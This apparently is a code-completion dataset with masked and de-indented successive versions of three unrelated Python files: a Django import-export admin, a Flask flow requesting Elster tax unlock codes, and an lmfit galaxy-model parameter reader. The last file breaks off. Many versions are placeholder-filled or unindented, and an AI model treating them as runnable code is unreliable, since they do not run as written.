class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
    resource_class = DataResource  # was 'resources_class', a typo ImportExportMixin silently ignores
admin.site.register(Data, DataAdmin)
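# --- Editorial sketch (assumes django-import-export/tablib in a configured
# Django project; note that ModelResource imports generally also expect
# Meta.model = Data to be set). Importing rows through DataResource lets the
# ForeignKeyWidget columns resolve 'groupname'/'system_name' by name:
#
#     from tablib import Dataset
#     dataset = Dataset().load(open('data.csv').read(), format='csv')
#     result = DataResource().import_data(dataset, dry_run=True)   # validate
#     if not result.has_errors():
#         DataResource().import_data(dataset, dry_run=False)       # commit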
| from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup,Addsystemname,Zhuanzhebushi,Yewuzerenbumen,czyylx,Zhuanze,Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
# Register your models here.
class DataResource(resources.ModelResource):
groupname = fields.Field( widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute='system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = ('groupname','system_name','I6000')
class DataAdmin(ImportExportMixin,admin.ModelAdmin):
list_display = ['groupname','system_name','I6000','xtjslx','bslx','ywbs','ywzrbs','yunxingzhuangtai','url','xtsxsj','xtxxsj','ip','xunijiqunip','date']
    resource_class = DataResource # was 'resources_class', a typo ImportExportMixin silently ignores
admin.site.register(Data,DataAdmin) | [
3,
4,
5,
6,
7
] |
649 | cddb16a305f74eb1a3f2854208f8508c4a7a8953 | <mask token>
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
<mask token>
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
<mask token>
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| <mask token>
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
<mask token>
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self
)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _(
'form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry(
'Confirmed registration data privacy', request.
remote_addr, stored_data['idnr'],
'registration_confirm_data_privacy', stored_data[
'registration_confirm_data_privacy'])
create_audit_log_confirmation_entry(
'Confirmed registration terms of service', request.
remote_addr, stored_data['idnr'],
'registration_confirm_terms_of_service', stored_data[
'registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry(
'Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry(
'Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
render_info.next_url = self.url_for_step(
UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info('Could not request unlock code for user',
exc_info=True)
pass
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep
.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| <mask token>
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
_DEBUG_DATA = UnlockCodeRequestInputStep, {'idnr': '04452397687', 'dob':
datetime.date(1985, 1, 1), 'registration_confirm_data_privacy':
True, 'registration_confirm_terms_of_service': True,
'registration_confirm_incomes': True, 'registration_confirm_e_data':
True}
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self
)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _(
'form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry(
'Confirmed registration data privacy', request.
remote_addr, stored_data['idnr'],
'registration_confirm_data_privacy', stored_data[
'registration_confirm_data_privacy'])
create_audit_log_confirmation_entry(
'Confirmed registration terms of service', request.
remote_addr, stored_data['idnr'],
'registration_confirm_terms_of_service', stored_data[
'registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry(
'Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry(
'Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
render_info.next_url = self.url_for_step(
UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info('Could not request unlock code for user',
exc_info=True)
pass
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep
.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| import datetime
from flask import request
from flask_babel import _
from markupsafe import escape
from app import app
from app.data_access.audit_log_controller import create_audit_log_confirmation_entry
from app.data_access.user_controller import user_exists, create_user
from app.data_access.user_controller_errors import UserAlreadyExistsError
from app.elster_client import elster_client
from app.elster_client.elster_errors import ElsterProcessNotSuccessful
from app.forms.flows.multistep_flow import MultiStepFlow
from app.forms.steps.unlock_code_request_steps import UnlockCodeRequestInputStep, UnlockCodeRequestSuccessStep, UnlockCodeRequestFailureStep
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
_DEBUG_DATA = UnlockCodeRequestInputStep, {'idnr': '04452397687', 'dob':
datetime.date(1985, 1, 1), 'registration_confirm_data_privacy':
True, 'registration_confirm_terms_of_service': True,
'registration_confirm_incomes': True, 'registration_confirm_e_data':
True}
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(title=_(
'form.auth-request.title'), steps=[UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep, UnlockCodeRequestSuccessStep],
endpoint=endpoint)
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self
)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _(
'form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry(
'Confirmed registration data privacy', request.
remote_addr, stored_data['idnr'],
'registration_confirm_data_privacy', stored_data[
'registration_confirm_data_privacy'])
create_audit_log_confirmation_entry(
'Confirmed registration terms of service', request.
remote_addr, stored_data['idnr'],
'registration_confirm_terms_of_service', stored_data[
'registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry(
'Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry(
'Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
render_info.next_url = self.url_for_step(
UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info('Could not request unlock code for user',
exc_info=True)
pass
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep
.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
This method requests an unlock code with Elster for not registered users. If successful
the users will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(
request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime('%d.%m.%Y'), request_id)
| import datetime
from flask import request
from flask_babel import _
from markupsafe import escape
from app import app
from app.data_access.audit_log_controller import create_audit_log_confirmation_entry
from app.data_access.user_controller import user_exists, create_user
from app.data_access.user_controller_errors import UserAlreadyExistsError
from app.elster_client import elster_client
from app.elster_client.elster_errors import ElsterProcessNotSuccessful
from app.forms.flows.multistep_flow import MultiStepFlow
from app.forms.steps.unlock_code_request_steps import UnlockCodeRequestInputStep, UnlockCodeRequestSuccessStep, \
UnlockCodeRequestFailureStep
class UnlockCodeRequestMultiStepFlow(MultiStepFlow):
_DEBUG_DATA = (
UnlockCodeRequestInputStep,
{
'idnr': '04452397687',
'dob': datetime.date(1985, 1, 1),
'registration_confirm_data_privacy': True,
'registration_confirm_terms_of_service': True,
'registration_confirm_incomes': True,
'registration_confirm_e_data': True,
}
)
def __init__(self, endpoint):
super(UnlockCodeRequestMultiStepFlow, self).__init__(
title=_('form.auth-request.title'),
steps=[
UnlockCodeRequestInputStep,
UnlockCodeRequestFailureStep,
UnlockCodeRequestSuccessStep
],
endpoint=endpoint,
)
# TODO: Use inheritance to clean up this method
def _handle_specifics_for_step(self, step, render_info, stored_data):
render_info, stored_data = super(UnlockCodeRequestMultiStepFlow, self)._handle_specifics_for_step(step, render_info, stored_data)
if isinstance(step, UnlockCodeRequestInputStep):
render_info.additional_info['next_button_label'] = _('form.register')
if request.method == 'POST' and render_info.form.validate():
create_audit_log_confirmation_entry('Confirmed registration data privacy', request.remote_addr,
stored_data['idnr'], 'registration_confirm_data_privacy',
stored_data['registration_confirm_data_privacy'])
create_audit_log_confirmation_entry('Confirmed registration terms of service', request.remote_addr,
stored_data['idnr'], 'registration_confirm_terms_of_service',
stored_data['registration_confirm_terms_of_service'])
create_audit_log_confirmation_entry('Confirmed registration incomes', request.remote_addr,
stored_data['idnr'], 'registration_confirm_incomes',
stored_data['registration_confirm_incomes'])
create_audit_log_confirmation_entry('Confirmed registration edata', request.remote_addr,
stored_data['idnr'], 'registration_confirm_e_data',
stored_data['registration_confirm_e_data'])
try:
self._register_user(stored_data)
# prevent going to failure page as in normal flow
render_info.next_url = self.url_for_step(UnlockCodeRequestSuccessStep.name)
except (UserAlreadyExistsError, ElsterProcessNotSuccessful):
app.logger.info("Could not request unlock code for user", exc_info=True)
pass # go to failure step
elif isinstance(step, UnlockCodeRequestFailureStep):
render_info.next_url = None
elif isinstance(step, UnlockCodeRequestSuccessStep):
render_info.prev_url = self.url_for_step(UnlockCodeRequestInputStep.name)
return render_info, stored_data
@staticmethod
def _register_user(request_form):
"""
        This method requests an unlock code with Elster for unregistered users. If successful,
        the user will be registered.
:param request_form: The form attribute of the request. It should contain an idnr and a dob element.
"""
idnr = request_form['idnr']
if user_exists(idnr):
raise UserAlreadyExistsError(idnr)
response = elster_client.send_unlock_code_request_with_elster(request_form, request.remote_addr)
request_id = escape(response['elster_request_id'])
create_user(idnr, request_form['dob'].strftime("%d.%m.%Y"), request_id)
| [
3,
4,
5,
6,
7
] |
650 | 219b22b6ad685fc316b1df02cc924a1cfec89f5b | <mask token>
| <mask token>
def readInputModel(txt, equivalentAxisFit, Settings):
psfwing_02pxscale_datatab = None
psfwing_logscale_datatab = None
componentslist = []
params = Parameters()
data = open(txt)
for line in data:
if line[0] != '#':
comp = Component()
comp.number = int(line.split()[0])
comp.name = str(line.split()[1])
if comp.name == 'ferrer':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 4.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 4.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, 1.999, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, 1.999, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'tsersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, None, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'sersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
if comp.name == 'tdisc' or comp.name == 'gring':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, None, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
elif comp.name == 'gaussian' or comp.name == 'disc':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p1, p2)
params.add_many(p1, p2)
componentslist.append(comp)
elif comp.name == 'psf' or comp.name == 'psfwing':
par2name = 'par2_' + str(line.split()[0])
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p2)
params.add_many(p2)
componentslist.append(comp)
if comp.name == 'psfwing':
psfwing_02pxscale_datatab = readEllipseOutput(
'star_02pxscale.ell')
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'
] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'] * np.sqrt(
1 - psfwing_02pxscale_datatab['ellip'])
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'] / max(
psfwing_02pxscale_datatab['intens'])
psfwing_logscale_datatab = readEllipseOutput(
'star_logscale.ell')
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab[
'sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_logscale_datatab['sma'
] = psfwing_logscale_datatab['sma'] * np.sqrt(1 -
psfwing_logscale_datatab['ellip'])
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'] / max(
psfwing_logscale_datatab['intens'])
return (componentslist, params, psfwing_02pxscale_datatab,
psfwing_logscale_datatab)
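# Illustrative aside (not from the original sample): each tuple handed to
# lmfit's Parameters.add_many() unpacks as (name, value, vary, min, max, expr),
# which is exactly how the p1..p4 tuples above are constructed.
#
#     >>> from lmfit import Parameters
#     >>> demo = Parameters()
#     >>> demo.add_many(('par1_1', 10.0, True, 0.01, None, None),
#     ...               ('par2_1', 20.0, False, None, 35.0, None))
#     >>> demo['par1_1'].min, demo['par2_1'].vary
#     (0.01, False)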
| from lmfit import Parameters
import numpy as np
from cls.cls import *
from reading.ellipseOutput import readEllipseOutput
def readInputModel(txt, equivalentAxisFit, Settings):
psfwing_02pxscale_datatab = None
psfwing_logscale_datatab = None
componentslist = []
params = Parameters()
data = open(txt)
for line in data:
if line[0] != '#':
comp = Component()
comp.number = int(line.split()[0])
comp.name = str(line.split()[1])
if comp.name == 'ferrer':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 4.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 4.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, 1.999, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, 1.999, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'tsersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
p4 = par4name, float(line.split()[8]), True, 0.01, None, None
if line.split()[9] == 'False':
p4 = par4name, float(line.split()[8]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if comp.name == 'sersic':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, 20.0, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, 20.0, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
if comp.name == 'tdisc' or comp.name == 'gring':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
p3 = par3name, float(line.split()[6]), True, 0.01, None, None
if line.split()[7] == 'False':
p3 = par3name, float(line.split()[6]
), False, 0.01, None, None
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
elif comp.name == 'gaussian' or comp.name == 'disc':
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
p1 = par1name, float(line.split()[2]), True, 0.01, None, None
if line.split()[3] == 'False':
p1 = par1name, float(line.split()[2]
), False, 0.01, None, None
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p1, p2)
params.add_many(p1, p2)
componentslist.append(comp)
elif comp.name == 'psf' or comp.name == 'psfwing':
par2name = 'par2_' + str(line.split()[0])
p2 = par2name, float(line.split()[4]), True, None, 35.0, None
if line.split()[5] == 'False':
p2 = par2name, float(line.split()[4]
), False, None, 35.0, None
comp.parameters.add_many(p2)
params.add_many(p2)
componentslist.append(comp)
if comp.name == 'psfwing':
psfwing_02pxscale_datatab = readEllipseOutput(
'star_02pxscale.ell')
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'
] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_02pxscale_datatab['sma'
] = psfwing_02pxscale_datatab['sma'] * np.sqrt(
1 - psfwing_02pxscale_datatab['ellip'])
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_02pxscale_datatab['intens'
] = psfwing_02pxscale_datatab['intens'] / max(
psfwing_02pxscale_datatab['intens'])
psfwing_logscale_datatab = readEllipseOutput(
'star_logscale.ell')
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab[
'sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_logscale_datatab['sma'
] = psfwing_logscale_datatab['sma'] * np.sqrt(1 -
psfwing_logscale_datatab['ellip'])
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'
] / Settings.pxlToArcsec ** 2
psfwing_logscale_datatab['intens'
] = psfwing_logscale_datatab['intens'] / max(
psfwing_logscale_datatab['intens'])
return (componentslist, params, psfwing_02pxscale_datatab,
psfwing_logscale_datatab)
| from lmfit import Parameters
import numpy as np
from cls.cls import *
from reading.ellipseOutput import readEllipseOutput
def readInputModel(txt, equivalentAxisFit, Settings):
psfwing_02pxscale_datatab = None
psfwing_logscale_datatab = None
componentslist = []
params = Parameters()
data = open(txt)
for line in data:
if (line[0] != '#'):
comp = Component()
comp.number = int(line.split()[0])
comp.name = str(line.split()[1])
#components with 4 parameters
if (comp.name == 'ferrer'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # r_out
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, 4.0, None) # alpha
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, 4.0, None)
p4 = (par4name, float(line.split()[8]), True, 0.01, 1.999, None) # beta
if (line.split()[9] == 'False'):
p4 = (par4name, float(line.split()[8]), False, 0.01, 1.999, None)
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if (comp.name == 'tsersic'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # r_e
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_e
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, 20.0, None) # n
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, 20.0, None)
p4 = (par4name, float(line.split()[8]), True, 0.01, None, None) # r_out
if (line.split()[9] == 'False'):
p4 = (par4name, float(line.split()[8]), False, 0.01, None, None)
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
#components with 3 parameters
if (comp.name == 'sersic'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # r_e
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_e
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, 20.0, None) # n
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, 20.0, None)
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
if (comp.name == 'tdisc' or comp.name == 'gring'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # h # fwhm
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0 # mu_0
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, None, None) # r_out # r_0
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, None, None)
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
#components with two parameters
elif (comp.name == 'gaussian' or comp.name == 'disc'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # h or fwhm ..
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0 or mag
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
comp.parameters.add_many(p1, p2)
params.add_many(p1, p2)
componentslist.append(comp)
#components with one parameter
elif (comp.name == 'psf' or comp.name == 'psfwing'):
par2name = 'par2_' + str(line.split()[0])
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0 or mag
if (line.split()[5] == 'False'):
